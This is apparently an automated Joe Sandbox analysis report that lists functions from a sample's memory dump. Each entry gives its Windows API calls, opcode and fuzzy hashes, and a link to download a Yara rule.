                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4271482742-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004555B8 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4023252218-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046032B Relevance: 7.5, APIs: 5, Instructions: 43windowtimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 0046036D
                                                                                                                                                                                                                                                                                                                                                                                                                • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                                                                                                                                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00455505 Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1489400265-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045551F Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1042038666-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043315E Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2625713937-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004140CF Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 0041410F
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                                                                                                                                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 00414135
                                                                                                                                                                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 132634196-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00415601 Relevance: 7.5, APIs: 5, Instructions: 23threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd_noexit.LIBCMT ref: 00415620
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                                                                                                                                                                                                                                                                                                                                                                                                                • __freeptd.LIBCMT ref: 0041563B
                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 00415643
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3798957060-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0041567F Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                                                                                                                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                                                                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1537469427-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040AB16 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 423COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _malloc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Default$|k
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1579825452-2254895183
